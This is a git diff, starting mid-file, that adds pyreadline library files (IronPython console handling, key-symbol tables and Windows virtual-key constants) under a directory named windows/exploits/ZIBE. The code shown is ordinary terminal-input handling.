rowfill = fill[:1] * abs(x1 - x0)
|
||||
else:
|
||||
rowfill = u' ' * abs(x1 - x0)
|
||||
for y in range(y0, y1):
|
||||
System.Console.SetCursorPosition(x0, y)
|
||||
self.write_color(rowfill, attr)
|
||||
self.pos(*oldpos)
|
||||
|
||||
def scroll(self, rect, dx, dy, attr=None, fill=' '):
|
||||
u'''Scroll a rectangle.'''
|
||||
raise NotImplementedError
|
||||
|
||||
def scroll_window(self, lines):
|
||||
u'''Scroll the window by the indicated number of lines.'''
|
||||
top = self.WindowTop + lines
|
||||
if top < 0:
|
||||
top = 0
|
||||
if top + System.Console.WindowHeight > System.Console.BufferHeight:
|
||||
top = System.Console.BufferHeight
|
||||
self.WindowTop = top
|
||||
|
||||
def getkeypress(self):
|
||||
u'''Return next key press event from the queue, ignoring others.'''
|
||||
ck = System.ConsoleKey
|
||||
while 1:
|
||||
e = System.Console.ReadKey(True)
|
||||
if e.Key == System.ConsoleKey.PageDown: #PageDown
|
||||
self.scroll_window(12)
|
||||
elif e.Key == System.ConsoleKey.PageUp:#PageUp
|
||||
self.scroll_window(-12)
|
||||
elif str(e.KeyChar) == u"\000":#Drop deadkeys
|
||||
log(u"Deadkey: %s"%e)
|
||||
return event(self, e)
|
||||
else:
|
||||
return event(self, e)
|
||||
|
||||
def title(self, txt=None):
|
||||
u'''Set/get title.'''
|
||||
if txt:
|
||||
System.Console.Title = txt
|
||||
else:
|
||||
return System.Console.Title
|
||||
|
||||
def size(self, width=None, height=None):
|
||||
u'''Set/get window size.'''
|
||||
sc = System.Console
|
||||
if width is not None and height is not None:
|
||||
sc.BufferWidth, sc.BufferHeight = width,height
|
||||
else:
|
||||
return sc.BufferWidth, sc.BufferHeight
|
||||
|
||||
if width is not None and height is not None:
|
||||
sc.WindowWidth, sc.WindowHeight = width,height
|
||||
else:
|
||||
return sc.WindowWidth - 1, sc.WindowHeight - 1
|
||||
|
||||
def cursor(self, visible=True, size=None):
|
||||
u'''Set cursor on or off.'''
|
||||
System.Console.CursorVisible = visible
|
||||
|
||||
def bell(self):
|
||||
System.Console.Beep()
|
||||
|
||||
def next_serial(self):
|
||||
u'''Get next event serial number.'''
|
||||
self.serial += 1
|
||||
return self.serial
|
||||
|
||||
class event(Event):
|
||||
u'''Represent events from the console.'''
|
||||
def __init__(self, console, input):
|
||||
u'''Initialize an event from the Windows input structure.'''
|
||||
self.type = u'??'
|
||||
self.serial = console.next_serial()
|
||||
self.width = 0
|
||||
self.height = 0
|
||||
self.x = 0
|
||||
self.y = 0
|
||||
self.char = str(input.KeyChar)
|
||||
self.keycode = input.Key
|
||||
self.state = input.Modifiers
|
||||
log(u"%s,%s,%s"%(input.Modifiers, input.Key, input.KeyChar))
|
||||
self.type = "KeyRelease"
|
||||
self.keysym = make_keysym(self.keycode)
|
||||
self.keyinfo = make_KeyPress(self.char, self.state, self.keycode)
|
||||
|
||||
def make_event_from_keydescr(keydescr):
|
||||
def input():
|
||||
return 1
|
||||
input.KeyChar = u"a"
|
||||
input.Key = System.ConsoleKey.A
|
||||
input.Modifiers = System.ConsoleModifiers.Shift
|
||||
input.next_serial = input
|
||||
e = event(input,input)
|
||||
del input.next_serial
|
||||
keyinfo = make_KeyPress_from_keydescr(keydescr)
|
||||
e.keyinfo = keyinfo
|
||||
return e
|
||||
|
||||
CTRL_C_EVENT=make_event_from_keydescr(u"Control-c")
|
||||
|
||||
def install_readline(hook):
|
||||
def hook_wrap():
|
||||
try:
|
||||
res = hook()
|
||||
except KeyboardInterrupt,x: #this exception does not seem to be caught
|
||||
res = u""
|
||||
except EOFError:
|
||||
return None
|
||||
if res[-1:] == u"\n":
|
||||
return res[:-1]
|
||||
else:
|
||||
return res
|
||||
class IronPythonWrapper(IronPythonConsole.IConsole):
|
||||
def ReadLine(self, autoIndentSize):
|
||||
return hook_wrap()
|
||||
def Write(self, text, style):
|
||||
System.Console.Write(text)
|
||||
def WriteLine(self, text, style):
|
||||
System.Console.WriteLine(text)
|
||||
IronPythonConsole.PythonCommandLine.MyConsole = IronPythonWrapper()
|
||||
|
||||
|
||||
|
||||
if __name__ == u'__main__':
|
||||
import time, sys
|
||||
c = Console(0)
|
||||
sys.stdout = c
|
||||
sys.stderr = c
|
||||
c.page()
|
||||
c.pos(5, 10)
|
||||
c.write(u'hi there')
|
||||
c.title(u"Testing console")
|
||||
# c.bell()
|
||||
print
|
||||
print u"size", c.size()
|
||||
print u' some printed output'
|
||||
for i in range(10):
|
||||
e = c.getkeypress()
|
||||
print e.Key, chr(e.KeyChar), ord(e.KeyChar), e.Modifiers
|
||||
del c
|
||||
|
||||
System.Console.Clear()
|
||||
BIN
windows/exploits/ZIBE/pyreadline/error.pyc
Normal file
BIN
windows/exploits/ZIBE/pyreadline/error.pyc
Normal file
Binary file not shown.
18
windows/exploits/ZIBE/pyreadline/get_doc.py
Normal file
18
windows/exploits/ZIBE/pyreadline/get_doc.py
Normal file
|
|
@ -0,0 +1,18 @@
|
|||
import sys,textwrap
|
||||
|
||||
rlmain = sys.modules[u"pyreadline.rlmain"]
|
||||
rl = rlmain.rl
|
||||
|
||||
def get_doc(rl):
|
||||
methods = [(x, getattr(rl, x)) for x in dir(rl) if callable(getattr(rl, x))]
|
||||
return [ (x, m.__doc__ )for x, m in methods if m.__doc__]
|
||||
|
||||
|
||||
def get_rest(rl):
|
||||
q = get_doc(rl)
|
||||
out = []
|
||||
for funcname, doc in q:
|
||||
out.append(funcname)
|
||||
out.append(u"\n".join(textwrap.wrap(doc, 80, initial_indent=u" ")))
|
||||
out.append(u"")
|
||||
return out
|
||||
20
windows/exploits/ZIBE/pyreadline/keysyms/__init__.py
Normal file
20
windows/exploits/ZIBE/pyreadline/keysyms/__init__.py
Normal file
|
|
@ -0,0 +1,20 @@
|
|||
import sys
|
||||
|
||||
success = False
|
||||
in_ironpython = u"IronPython" in sys.version
|
||||
|
||||
if in_ironpython:
|
||||
try:
|
||||
from ironpython_keysyms import *
|
||||
success = True
|
||||
except ImportError, x:
|
||||
raise
|
||||
else:
|
||||
try:
|
||||
from keysyms import *
|
||||
success = True
|
||||
except ImportError, x:
|
||||
pass
|
||||
|
||||
if not success:
|
||||
raise ImportError(u"Could not import keysym for local pythonversion", x)
|
||||
127
windows/exploits/ZIBE/pyreadline/keysyms/common.py
Normal file
127
windows/exploits/ZIBE/pyreadline/keysyms/common.py
Normal file
|
|
@ -0,0 +1,127 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
# table for translating virtual keys to X windows key symbols
|
||||
|
||||
try:
|
||||
set
|
||||
except NameError:
|
||||
from sets import Set as set
|
||||
|
||||
from pyreadline.unicode_helper import ensure_unicode
|
||||
|
||||
validkey =set([u'cancel', u'backspace', u'tab', u'clear',
|
||||
u'return', u'shift_l', u'control_l', u'alt_l',
|
||||
u'pause', u'caps_lock', u'escape', u'space',
|
||||
u'prior', u'next', u'end', u'home',
|
||||
u'left', u'up', u'right', u'down',
|
||||
u'select', u'print', u'execute', u'snapshot',
|
||||
u'insert', u'delete', u'help', u'f1',
|
||||
u'f2', u'f3', u'f4', u'f5',
|
||||
u'f6', u'f7', u'f8', u'f9',
|
||||
u'f10', u'f11', u'f12', u'f13',
|
||||
u'f14', u'f15', u'f16', u'f17',
|
||||
u'f18', u'f19', u'f20', u'f21',
|
||||
u'f22', u'f23', u'f24', u'num_lock',
|
||||
u'scroll_lock', u'vk_apps', u'vk_processkey',u'vk_attn',
|
||||
u'vk_crsel', u'vk_exsel', u'vk_ereof', u'vk_play',
|
||||
u'vk_zoom', u'vk_noname', u'vk_pa1', u'vk_oem_clear',
|
||||
u'numpad0', u'numpad1', u'numpad2', u'numpad3',
|
||||
u'numpad4', u'numpad5', u'numpad6', u'numpad7',
|
||||
u'numpad8', u'numpad9', u'divide', u'multiply',
|
||||
u'add', u'subtract', u'vk_decimal'])
|
||||
|
||||
escape_sequence_to_special_key = {u"\\e[a" : u"up", u"\\e[b" : u"down", u"del" : u"delete"}
|
||||
|
||||
class KeyPress(object):
|
||||
def __init__(self, char=u"", shift=False, control=False, meta=False, keyname=u""):
|
||||
if control or meta or shift:
|
||||
char = char.upper()
|
||||
self.info = dict(char=char,
|
||||
shift=shift,
|
||||
control=control,
|
||||
meta=meta,
|
||||
keyname=keyname)
|
||||
|
||||
def create(name):
|
||||
def get(self):
|
||||
return self.info[name]
|
||||
|
||||
def set(self, value):
|
||||
self.info[name] = value
|
||||
return property(get, set)
|
||||
char = create(u"char")
|
||||
shift = create(u"shift")
|
||||
control = create(u"control")
|
||||
meta = create(u"meta")
|
||||
keyname = create(u"keyname")
|
||||
|
||||
def __repr__(self):
|
||||
return u"(%s,%s,%s,%s)"%tuple(map(ensure_unicode, self.tuple()))
|
||||
|
||||
def tuple(self):
|
||||
if self.keyname:
|
||||
return (self.control, self.meta, self.shift, self.keyname)
|
||||
else:
|
||||
if self.control or self.meta or self.shift:
|
||||
return (self.control, self.meta, self.shift, self.char.upper())
|
||||
else:
|
||||
return (self.control, self.meta, self.shift, self.char)
|
||||
|
||||
def __eq__(self, other):
|
||||
if isinstance(other, KeyPress):
|
||||
s = self.tuple()
|
||||
o = other.tuple()
|
||||
return s == o
|
||||
else:
|
||||
return False
|
||||
|
||||
def make_KeyPress_from_keydescr(keydescr):
|
||||
keyinfo = KeyPress()
|
||||
if len(keydescr) > 2 and keydescr[:1] == u'"' and keydescr[-1:] == u'"':
|
||||
keydescr = keydescr[1:-1]
|
||||
|
||||
while 1:
|
||||
lkeyname = keydescr.lower()
|
||||
if lkeyname.startswith(u'control-'):
|
||||
keyinfo.control = True
|
||||
keydescr = keydescr[8:]
|
||||
elif lkeyname.startswith(u'ctrl-'):
|
||||
keyinfo.control = True
|
||||
keydescr = keydescr[5:]
|
||||
elif keydescr.lower().startswith(u'\\c-'):
|
||||
keyinfo.control = True
|
||||
keydescr = keydescr[3:]
|
||||
elif keydescr.lower().startswith(u'\\m-'):
|
||||
keyinfo.meta = True
|
||||
keydescr = keydescr[3:]
|
||||
elif keydescr in escape_sequence_to_special_key:
|
||||
keydescr = escape_sequence_to_special_key[keydescr]
|
||||
elif lkeyname.startswith(u'meta-'):
|
||||
keyinfo.meta = True
|
||||
keydescr = keydescr[5:]
|
||||
elif lkeyname.startswith(u'alt-'):
|
||||
keyinfo.meta = True
|
||||
keydescr = keydescr[4:]
|
||||
elif lkeyname.startswith(u'shift-'):
|
||||
keyinfo.shift = True
|
||||
keydescr = keydescr[6:]
|
||||
else:
|
||||
if len(keydescr) > 1:
|
||||
if keydescr.strip().lower() in validkey:
|
||||
keyinfo.keyname = keydescr.strip().lower()
|
||||
keyinfo.char = ""
|
||||
else:
|
||||
raise IndexError(u"Not a valid key: '%s'"%keydescr)
|
||||
else:
|
||||
keyinfo.char = keydescr
|
||||
return keyinfo
|
||||
|
||||
if __name__ == u"__main__":
|
||||
import startup
|
||||
|
||||
202
windows/exploits/ZIBE/pyreadline/keysyms/ironpython_keysyms.py
Normal file
202
windows/exploits/ZIBE/pyreadline/keysyms/ironpython_keysyms.py
Normal file
|
|
@ -0,0 +1,202 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import System
|
||||
from common import validkey, KeyPress, make_KeyPress_from_keydescr
|
||||
|
||||
c32 = System.ConsoleKey
|
||||
Shift = System.ConsoleModifiers.Shift
|
||||
Control = System.ConsoleModifiers.Control
|
||||
Alt = System.ConsoleModifiers.Alt
|
||||
# table for translating virtual keys to X windows key symbols
|
||||
code2sym_map = {#c32.CANCEL: u'Cancel',
|
||||
c32.Backspace: u'BackSpace',
|
||||
c32.Tab: u'Tab',
|
||||
c32.Clear: u'Clear',
|
||||
c32.Enter: u'Return',
|
||||
# c32.Shift: u'Shift_L',
|
||||
# c32.Control: u'Control_L',
|
||||
# c32.Menu: u'Alt_L',
|
||||
c32.Pause: u'Pause',
|
||||
# c32.Capital: u'Caps_Lock',
|
||||
c32.Escape: u'Escape',
|
||||
# c32.Space: u'space',
|
||||
c32.PageUp: u'Prior',
|
||||
c32.PageDown: u'Next',
|
||||
c32.End: u'End',
|
||||
c32.Home: u'Home',
|
||||
c32.LeftArrow: u'Left',
|
||||
c32.UpArrow: u'Up',
|
||||
c32.RightArrow: u'Right',
|
||||
c32.DownArrow: u'Down',
|
||||
c32.Select: u'Select',
|
||||
c32.Print: u'Print',
|
||||
c32.Execute: u'Execute',
|
||||
# c32.Snapshot: u'Snapshot',
|
||||
c32.Insert: u'Insert',
|
||||
c32.Delete: u'Delete',
|
||||
c32.Help: u'Help',
|
||||
c32.F1: u'F1',
|
||||
c32.F2: u'F2',
|
||||
c32.F3: u'F3',
|
||||
c32.F4: u'F4',
|
||||
c32.F5: u'F5',
|
||||
c32.F6: u'F6',
|
||||
c32.F7: u'F7',
|
||||
c32.F8: u'F8',
|
||||
c32.F9: u'F9',
|
||||
c32.F10: u'F10',
|
||||
c32.F11: u'F11',
|
||||
c32.F12: u'F12',
|
||||
c32.F13: u'F13',
|
||||
c32.F14: u'F14',
|
||||
c32.F15: u'F15',
|
||||
c32.F16: u'F16',
|
||||
c32.F17: u'F17',
|
||||
c32.F18: u'F18',
|
||||
c32.F19: u'F19',
|
||||
c32.F20: u'F20',
|
||||
c32.F21: u'F21',
|
||||
c32.F22: u'F22',
|
||||
c32.F23: u'F23',
|
||||
c32.F24: u'F24',
|
||||
# c32.Numlock: u'Num_Lock,',
|
||||
# c32.Scroll: u'Scroll_Lock',
|
||||
# c32.Apps: u'VK_APPS',
|
||||
# c32.ProcesskeY: u'VK_PROCESSKEY',
|
||||
# c32.Attn: u'VK_ATTN',
|
||||
# c32.Crsel: u'VK_CRSEL',
|
||||
# c32.Exsel: u'VK_EXSEL',
|
||||
# c32.Ereof: u'VK_EREOF',
|
||||
# c32.Play: u'VK_PLAY',
|
||||
# c32.Zoom: u'VK_ZOOM',
|
||||
# c32.Noname: u'VK_NONAME',
|
||||
# c32.Pa1: u'VK_PA1',
|
||||
c32.OemClear: u'VK_OEM_CLEAR',
|
||||
c32.NumPad0: u'NUMPAD0',
|
||||
c32.NumPad1: u'NUMPAD1',
|
||||
c32.NumPad2: u'NUMPAD2',
|
||||
c32.NumPad3: u'NUMPAD3',
|
||||
c32.NumPad4: u'NUMPAD4',
|
||||
c32.NumPad5: u'NUMPAD5',
|
||||
c32.NumPad6: u'NUMPAD6',
|
||||
c32.NumPad7: u'NUMPAD7',
|
||||
c32.NumPad8: u'NUMPAD8',
|
||||
c32.NumPad9: u'NUMPAD9',
|
||||
c32.Divide: u'Divide',
|
||||
c32.Multiply: u'Multiply',
|
||||
c32.Add: u'Add',
|
||||
c32.Subtract: u'Subtract',
|
||||
c32.Decimal: u'VK_DECIMAL'
|
||||
}
|
||||
|
||||
# function to handle the mapping
|
||||
def make_keysym(keycode):
|
||||
try:
|
||||
sym = code2sym_map[keycode]
|
||||
except KeyError:
|
||||
sym = u''
|
||||
return sym
|
||||
|
||||
sym2code_map = {}
|
||||
for code,sym in code2sym_map.iteritems():
|
||||
sym2code_map[sym.lower()] = code
|
||||
|
||||
def key_text_to_keyinfo(keytext):
|
||||
u'''Convert a GNU readline style textual description of a key to keycode with modifiers'''
|
||||
if keytext.startswith('"'): # "
|
||||
return keyseq_to_keyinfo(keytext[1:-1])
|
||||
else:
|
||||
return keyname_to_keyinfo(keytext)
|
||||
|
||||
|
||||
def char_to_keyinfo(char, control=False, meta=False, shift=False):
|
||||
vk = (ord(char))
|
||||
if vk & 0xffff == 0xffff:
|
||||
print u'VkKeyScan("%s") = %x' % (char, vk)
|
||||
raise ValueError, u'bad key'
|
||||
if vk & 0x100:
|
||||
shift = True
|
||||
if vk & 0x200:
|
||||
control = True
|
||||
if vk & 0x400:
|
||||
meta = True
|
||||
return (control, meta, shift, vk & 0xff)
|
||||
|
||||
def keyname_to_keyinfo(keyname):
|
||||
control = False
|
||||
meta = False
|
||||
shift = False
|
||||
|
||||
while 1:
|
||||
lkeyname = keyname.lower()
|
||||
if lkeyname.startswith(u'control-'):
|
||||
control = True
|
||||
keyname = keyname[8:]
|
||||
elif lkeyname.startswith(u'ctrl-'):
|
||||
control = True
|
||||
keyname = keyname[5:]
|
||||
elif lkeyname.startswith(u'meta-'):
|
||||
meta = True
|
||||
keyname = keyname[5:]
|
||||
elif lkeyname.startswith(u'alt-'):
|
||||
meta = True
|
||||
keyname = keyname[4:]
|
||||
elif lkeyname.startswith(u'shift-'):
|
||||
shift = True
|
||||
keyname = keyname[6:]
|
||||
else:
|
||||
if len(keyname) > 1:
|
||||
return (control, meta, shift, sym2code_map.get(keyname.lower(),u" "))
|
||||
else:
|
||||
return char_to_keyinfo(keyname, control, meta, shift)
|
||||
|
||||
def keyseq_to_keyinfo(keyseq):
|
||||
res = []
|
||||
control = False
|
||||
meta = False
|
||||
shift = False
|
||||
|
||||
while 1:
|
||||
if keyseq.startswith(u'\\C-'):
|
||||
control = True
|
||||
keyseq = keyseq[3:]
|
||||
elif keyseq.startswith(u'\\M-'):
|
||||
meta = True
|
||||
keyseq = keyseq[3:]
|
||||
elif keyseq.startswith(u'\\e'):
|
||||
res.append(char_to_keyinfo(u'\033', control, meta, shift))
|
||||
control = meta = shift = False
|
||||
keyseq = keyseq[2:]
|
||||
elif len(keyseq) >= 1:
|
||||
res.append(char_to_keyinfo(keyseq[0], control, meta, shift))
|
||||
control = meta = shift = False
|
||||
keyseq = keyseq[1:]
|
||||
else:
|
||||
return res[0]
|
||||
|
||||
def make_keyinfo(keycode, state):
|
||||
control = False
|
||||
meta =False
|
||||
shift = False
|
||||
return (control, meta, shift, keycode)
|
||||
|
||||
|
||||
def make_KeyPress(char, state, keycode):
|
||||
|
||||
shift = bool(int(state) & int(Shift))
|
||||
control = bool(int(state) & int(Control))
|
||||
meta = bool(int(state) & int(Alt))
|
||||
keyname = code2sym_map.get(keycode, u"").lower()
|
||||
if control and meta: #equivalent to altgr so clear flags
|
||||
control = False
|
||||
meta = False
|
||||
elif control:
|
||||
char = str(keycode)
|
||||
return KeyPress(char, shift, control, meta, keyname)
|
||||
|
||||
133
windows/exploits/ZIBE/pyreadline/keysyms/keysyms.py
Normal file
133
windows/exploits/ZIBE/pyreadline/keysyms/keysyms.py
Normal file
|
|
@ -0,0 +1,133 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
#*****************************************************************************
|
||||
# Copyright (C) 2003-2006 Gary Bishop.
|
||||
# Copyright (C) 2006 Jorgen Stenarson. <jorgen.stenarson@bostream.nu>
|
||||
#
|
||||
# Distributed under the terms of the BSD License. The full license is in
|
||||
# the file COPYING, distributed as part of this software.
|
||||
#*****************************************************************************
|
||||
import winconstants as c32
|
||||
from pyreadline.logger import log
|
||||
from ctypes import windll
|
||||
import ctypes
|
||||
# table for translating virtual keys to X windows key symbols
|
||||
|
||||
from common import validkey, KeyPress, make_KeyPress_from_keydescr
|
||||
|
||||
code2sym_map = {c32.VK_CANCEL: u'cancel',
|
||||
c32.VK_BACK: u'backspace',
|
||||
c32.VK_TAB: u'tab',
|
||||
c32.VK_CLEAR: u'clear',
|
||||
c32.VK_RETURN: u'return',
|
||||
c32.VK_SHIFT: u'shift_l',
|
||||
c32.VK_CONTROL: u'control_l',
|
||||
c32.VK_MENU: u'alt_l',
|
||||
c32.VK_PAUSE: u'pause',
|
||||
c32.VK_CAPITAL: u'caps_lock',
|
||||
c32.VK_ESCAPE: u'escape',
|
||||
c32.VK_SPACE: u'space',
|
||||
c32.VK_PRIOR: u'prior',
|
||||
c32.VK_NEXT: u'next',
|
||||
c32.VK_END: u'end',
|
||||
c32.VK_HOME: u'home',
|
||||
c32.VK_LEFT: u'left',
|
||||
c32.VK_UP: u'up',
|
||||
c32.VK_RIGHT: u'right',
|
||||
c32.VK_DOWN: u'down',
|
||||
c32.VK_SELECT: u'select',
|
||||
c32.VK_PRINT: u'print',
|
||||
c32.VK_EXECUTE: u'execute',
|
||||
c32.VK_SNAPSHOT: u'snapshot',
|
||||
c32.VK_INSERT: u'insert',
|
||||
c32.VK_DELETE: u'delete',
|
||||
c32.VK_HELP: u'help',
|
||||
c32.VK_F1: u'f1',
|
||||
c32.VK_F2: u'f2',
|
||||
c32.VK_F3: u'f3',
|
||||
c32.VK_F4: u'f4',
|
||||
c32.VK_F5: u'f5',
|
||||
c32.VK_F6: u'f6',
|
||||
c32.VK_F7: u'f7',
|
||||
c32.VK_F8: u'f8',
|
||||
c32.VK_F9: u'f9',
|
||||
c32.VK_F10: u'f10',
|
||||
c32.VK_F11: u'f11',
|
||||
c32.VK_F12: u'f12',
|
||||
c32.VK_F13: u'f13',
|
||||
c32.VK_F14: u'f14',
|
||||
c32.VK_F15: u'f15',
|
||||
c32.VK_F16: u'f16',
|
||||
c32.VK_F17: u'f17',
|
||||
c32.VK_F18: u'f18',
|
||||
c32.VK_F19: u'f19',
|
||||
c32.VK_F20: u'f20',
|
||||
c32.VK_F21: u'f21',
|
||||
c32.VK_F22: u'f22',
|
||||
c32.VK_F23: u'f23',
|
||||
c32.VK_F24: u'f24',
|
||||
c32.VK_NUMLOCK: u'num_lock,',
|
||||
c32.VK_SCROLL: u'scroll_lock',
|
||||
c32.VK_APPS: u'vk_apps',
|
||||
c32.VK_PROCESSKEY: u'vk_processkey',
|
||||
c32.VK_ATTN: u'vk_attn',
|
||||
c32.VK_CRSEL: u'vk_crsel',
|
||||
c32.VK_EXSEL: u'vk_exsel',
|
||||
c32.VK_EREOF: u'vk_ereof',
|
||||
c32.VK_PLAY: u'vk_play',
|
||||
c32.VK_ZOOM: u'vk_zoom',
|
||||
c32.VK_NONAME: u'vk_noname',
|
||||
c32.VK_PA1: u'vk_pa1',
|
||||
c32.VK_OEM_CLEAR: u'vk_oem_clear',
|
||||
c32.VK_NUMPAD0: u'numpad0',
|
||||
c32.VK_NUMPAD1: u'numpad1',
|
||||
c32.VK_NUMPAD2: u'numpad2',
|
||||
c32.VK_NUMPAD3: u'numpad3',
|
||||
c32.VK_NUMPAD4: u'numpad4',
|
||||
c32.VK_NUMPAD5: u'numpad5',
|
||||
c32.VK_NUMPAD6: u'numpad6',
|
||||
c32.VK_NUMPAD7: u'numpad7',
|
||||
c32.VK_NUMPAD8: u'numpad8',
|
||||
c32.VK_NUMPAD9: u'numpad9',
|
||||
c32.VK_DIVIDE: u'divide',
|
||||
c32.VK_MULTIPLY: u'multiply',
|
||||
c32.VK_ADD: u'add',
|
||||
c32.VK_SUBTRACT: u'subtract',
|
||||
c32.VK_DECIMAL: u'vk_decimal'
|
||||
}
|
||||
|
||||
VkKeyScan = windll.user32.VkKeyScanA
|
||||
|
||||
def char_to_keyinfo(char, control=False, meta=False, shift=False):
|
||||
k=KeyPress()
|
||||
vk = VkKeyScan(ord(char))
|
||||
if vk & 0xffff == 0xffff:
|
||||
print u'VkKeyScan("%s") = %x' % (char, vk)
|
||||
raise ValueError, u'bad key'
|
||||
if vk & 0x100:
|
||||
k.shift = True
|
||||
if vk & 0x200:
|
||||
k.control = True
|
||||
if vk & 0x400:
|
||||
k.meta = True
|
||||
k.char=chr(vk & 0xff)
|
||||
return k
|
||||
|
||||
def make_KeyPress(char, state, keycode):
|
||||
control = (state & (4+8)) != 0
|
||||
meta = (state & (1+2)) != 0
|
||||
shift = (state & 0x10) != 0
|
||||
if control and not meta:#Matches ctrl- chords should pass keycode as char
|
||||
char = chr(keycode)
|
||||
elif control and meta: #Matches alt gr and should just pass on char
|
||||
control = False
|
||||
meta = False
|
||||
try:
|
||||
keyname=code2sym_map[keycode]
|
||||
except KeyError:
|
||||
keyname = u""
|
||||
out = KeyPress(char, shift, control, meta, keyname)
|
||||
return out
|
||||
|
||||
if __name__==u"__main__":
|
||||
import startup
|
||||
|
||||
171
windows/exploits/ZIBE/pyreadline/keysyms/winconstants.py
Normal file
171
windows/exploits/ZIBE/pyreadline/keysyms/winconstants.py
Normal file
|
|
@ -0,0 +1,171 @@
|
|||
#This file contains constants that are normally found in win32all
|
||||
#But included here to avoid the dependency
|
||||
|
||||
VK_LBUTTON=1
|
||||
VK_RBUTTON=2
|
||||
VK_CANCEL=3
|
||||
VK_MBUTTON=4
|
||||
VK_XBUTTON1=5
|
||||
VK_XBUTTON2=6
|
||||
VK_BACK=8
|
||||
VK_TAB=9
|
||||
VK_CLEAR=12
|
||||
VK_RETURN=13
|
||||
VK_SHIFT=16
|
||||
VK_CONTROL=17
|
||||
VK_MENU=18
|
||||
VK_PAUSE=19
|
||||
VK_CAPITAL=20
|
||||
VK_KANA=0x15
|
||||
VK_HANGEUL=0x15
|
||||
VK_HANGUL=0x15
|
||||
VK_JUNJA=0x17
|
||||
VK_FINAL=0x18
|
||||
VK_HANJA=0x19
|
||||
VK_KANJI=0x19
|
||||
VK_ESCAPE=0x1B
|
||||
VK_CONVERT=0x1C
|
||||
VK_NONCONVERT=0x1D
|
||||
VK_ACCEPT=0x1E
|
||||
VK_MODECHANGE=0x1F
|
||||
VK_SPACE=32
|
||||
VK_PRIOR=33
|
||||
VK_NEXT=34
|
||||
VK_END=35
|
||||
VK_HOME=36
|
||||
VK_LEFT=37
|
||||
VK_UP=38
|
||||
VK_RIGHT=39
|
||||
VK_DOWN=40
|
||||
VK_SELECT=41
|
||||
VK_PRINT=42
|
||||
VK_EXECUTE=43
|
||||
VK_SNAPSHOT=44
|
||||
VK_INSERT=45
|
||||
VK_DELETE=46
|
||||
VK_HELP=47
|
||||
VK_LWIN=0x5B
|
||||
VK_RWIN=0x5C
|
||||
VK_APPS=0x5D
|
||||
VK_SLEEP=0x5F
|
||||
VK_NUMPAD0=0x60
|
||||
VK_NUMPAD1=0x61
|
||||
VK_NUMPAD2=0x62
|
||||
VK_NUMPAD3=0x63
|
||||
VK_NUMPAD4=0x64
|
||||
VK_NUMPAD5=0x65
|
||||
VK_NUMPAD6=0x66
|
||||
VK_NUMPAD7=0x67
|
||||
VK_NUMPAD8=0x68
|
||||
VK_NUMPAD9=0x69
|
||||
VK_MULTIPLY=0x6A
|
||||
VK_ADD=0x6B
|
||||
VK_SEPARATOR=0x6C
|
||||
VK_SUBTRACT=0x6D
|
||||
VK_DECIMAL=0x6E
|
||||
VK_DIVIDE=0x6F
|
||||
VK_F1=0x70
|
||||
VK_F2=0x71
|
||||
VK_F3=0x72
|
||||
VK_F4=0x73
|
||||
VK_F5=0x74
|
||||
VK_F6=0x75
|
||||
VK_F7=0x76
|
||||
VK_F8=0x77
|
||||
VK_F9=0x78
|
||||
VK_F10=0x79
|
||||
VK_F11=0x7A
|
||||
VK_F12=0x7B
|
||||
VK_F13=0x7C
|
||||
VK_F14=0x7D
|
||||
VK_F15=0x7E
|
||||
VK_F16=0x7F
|
||||
VK_F17=0x80
|
||||
VK_F18=0x81
|
||||
VK_F19=0x82
|
||||
VK_F20=0x83
|
||||
VK_F21=0x84
|
||||
VK_F22=0x85
|
||||
VK_F23=0x86
|
||||
VK_F24=0x87
|
||||
VK_NUMLOCK=0x90
|
||||
VK_SCROLL=0x91
|
||||
VK_LSHIFT=0xA0
|
||||
VK_RSHIFT=0xA1
|
||||
VK_LCONTROL=0xA2
|
||||
VK_RCONTROL=0xA3
|
||||
VK_LMENU=0xA4
|
||||
VK_RMENU=0xA5
|
||||
VK_BROWSER_BACK=0xA6
|
||||
VK_BROWSER_FORWARD=0xA7
|
||||
VK_BROWSER_REFRESH=0xA8
|
||||
VK_BROWSER_STOP=0xA9
|
||||
VK_BROWSER_SEARCH=0xAA
|
||||
VK_BROWSER_FAVORITES=0xAB
|
||||
VK_BROWSER_HOME=0xAC
|
||||
VK_VOLUME_MUTE=0xAD
|
||||
VK_VOLUME_DOWN=0xAE
|
||||
VK_VOLUME_UP=0xAF
|
||||
VK_MEDIA_NEXT_TRACK=0xB0
|
||||
VK_MEDIA_PREV_TRACK=0xB1
|
||||
VK_MEDIA_STOP=0xB2
|
||||
VK_MEDIA_PLAY_PAUSE=0xB3
|
||||
VK_LAUNCH_MAIL=0xB4
|
||||
VK_LAUNCH_MEDIA_SELECT=0xB5
|
||||
VK_LAUNCH_APP1=0xB6
|
||||
VK_LAUNCH_APP2=0xB7
|
||||
VK_OEM_1=0xBA
|
||||
VK_OEM_PLUS=0xBB
|
||||
VK_OEM_COMMA=0xBC
|
||||
VK_OEM_MINUS=0xBD
|
||||
VK_OEM_PERIOD=0xBE
|
||||
VK_OEM_2=0xBF
|
||||
VK_OEM_3=0xC0
|
||||
VK_OEM_4=0xDB
|
||||
VK_OEM_5=0xDC
|
||||
VK_OEM_6=0xDD
|
||||
VK_OEM_7=0xDE
|
||||
VK_OEM_8=0xDF
|
||||
VK_OEM_102=0xE2
|
||||
VK_PROCESSKEY=0xE5
|
||||
VK_PACKET=0xE7
|
||||
VK_ATTN=0xF6
|
||||
VK_CRSEL=0xF7
|
||||
VK_EXSEL=0xF8
|
||||
VK_EREOF=0xF9
|
||||
VK_PLAY=0xFA
|
||||
VK_ZOOM=0xFB
|
||||
VK_NONAME=0xFC
|
||||
VK_PA1=0xFD
|
||||
VK_OEM_CLEAR=0xFE
|
||||
|
||||
CF_TEXT=1
|
||||
CF_BITMAP=2
|
||||
